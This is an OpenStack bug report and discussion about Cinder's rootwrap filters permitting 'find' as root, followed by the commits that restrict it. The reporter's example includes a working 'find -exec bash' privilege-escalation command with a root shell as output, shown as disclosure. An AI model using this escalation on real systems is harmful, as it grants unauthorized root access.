Cinder's rootwrap filters allow to run find as root, which allows arbitrary commands

Bug #1250101 reported by Darragh O'Reilly on 2013-11-11
10
This bug affects 1 person
Affects Status Importance Assigned to Milestone
Cinder
Undecided
Daniel Gollub
OpenStack Security Advisory
Undecided
Unassigned
oslo-incubator
Undecided
Unassigned

Bug Description

The patch https://github.com/openstack/cinder/commit/688c515b9d662486395d36c303ca599376a1dc0d added the find command to etc/cinder/rootwrap.d/volume.filters. This introduces a security hole as the find command is able to call exec, and so the cinder user can run any command as root. For example:

vagrant@controller:~$ sudo -u cinder bash
cinder@controller:~$ id
uid=109(cinder) gid=115(cinder) groups=115(cinder)

cinder@controller:~$ sudo /usr/bin/cinder-rootwrap /etc/cinder/rootwrap.conf find /etc/hosts -exec bash \;

root@controller:~# id
uid=0(root) gid=0(root) groups=0(root)

I guess the way to fix this is to add a FindFilter to Oslo that rejects calls to find with the -exec or -execdir argument.

Jeremy Stanley (fungi) wrote :

John/Doug, thoughts on how and where we want to mitigate this initially? Patch rootwrap in Cinder first, then replicate that change to Oslo once the security advisory is published?

Thierry Carrez (ttx) wrote :

The issue does not live in Oslo. It lives in the filters that are shipped with Cinder. So that would only need to be fixed in Cinder.

That said, I'm not sure that would be security advisory material. The cinder user already has (limited) escalation to root, the rootwrap is just trying hard to limit the extent of it. Find is clearly not the only command that can be easily abused in Cinder volume.filters: this one also allows dd, chown, ln, chmod and mv... which can all be abused to fully escalate the cinder user to the root user on Cinder.

Like nova compute nodes, cinder volume nodes run, in effect, as root. Rootwrap is a tool that can be used to limit root escalation, but on those nodes there is still a lot of work to do before they can be considered truly isolated. Those efforts would fall into strengthening, rather than vulnerability fixing, since those weaknesses cannot be directly exploited (attacker needs to be able to execute code as the cinder user first).

This is very much like https://bugs.launchpad.net/nova/+bug/1081795 -- and the comment I made there also applies to this bug:

"""
So I would count this as a welcome strengthening step, but not issue an advisory about it (which could be interpreted as "we vouch that this user can't be escalated to root anymore") [...]

I'm also for making this bug public, unless one of you object.
"""

Changed in oslo:
status: New → Invalid
Changed in ossa:
status: New → Incomplete
summary: - rootwrap find allows arbitrary commands
+ Cinder's rootwrap filters allow to run find as root, which allows
+ arbitrary commands

that's ok with me.

Doug Hellmann (doug-hellmann) wrote :

Thierry's assessment seems correct to me.

John Griffith (john-griffith) wrote :

I'm in agreement with Thierry's assessment as well.

Jeremy Stanley (fungi) wrote :

I too agree, so switched it to public with no associated advisory.

Changed in ossa:
status: Incomplete → Invalid
information type: Private Security → Public
tags: added: security
Daniel Gollub (d-gollub) on 2014-02-22
Changed in cinder:
assignee: nobody → Daniel Gollub (d-gollub)
status: New → Confirmed

Fix proposed to branch: master
Review: https://review.openstack.org/75629

Changed in cinder:
status: Confirmed → In Progress

Reviewed: https://review.openstack.org/75629
Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=6af10e84e1a3f1e4673bc2f58142269a2bfeefcf
Submitter: Jenkins
Branch: master

commit 6af10e84e1a3f1e4673bc2f58142269a2bfeefcf
Author: Daniel Gollub <email address hidden>
Date: Wed Feb 19 07:37:20 2014 +0100

    Restrict rootwrap find filter for NetAppNFS driver

    Additional make the name of the filter unique, so it does not override
    any other rule. Like the find rule of the GPFS driver.
    Rootwrap is making use of plain python ConfigParser which handles INI files
    with key=value pair like fashion. Where the key is unique.

    Closes-Bug: 1250101

    Change-Id: Id2f193485089e12f00008b38fad2b95a09674ff2

Changed in cinder:
status: In Progress → Fix Committed

Reviewed: https://review.openstack.org/76529
Committed: https://git.openstack.org/cgit/openstack/cinder/commit/?id=2c44cfa2db0cd1a5ba6c02581b34136d7ee5d4fb
Submitter: Jenkins
Branch: master

commit 2c44cfa2db0cd1a5ba6c02581b34136d7ee5d4fb
Author: Daniel Gollub <email address hidden>
Date: Wed Feb 19 07:41:24 2014 +0100

    Restrict rootwrap find filter for IBM NAS and GPFS

    Additional make the name of the filter unique, so it does not override
    any other rule. Like the find rule of the NetAppNFS driver.
    Rootwrap is making use of plain python ConfigParser which handles INI files
    with key=value pair like fashion. Where the key is unique.

    Related-Bug: 1250101

    Change-Id: I56a96084dc736e73e3e9533803f65956699891a0

Thierry Carrez (ttx) on 2014-03-05
Changed in cinder:
milestone: none → icehouse-3
status: Fix Committed → Fix Released
Thierry Carrez (ttx) on 2014-04-17
Changed in cinder:
milestone: icehouse-3 → 2014.1
To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Other bug subscribers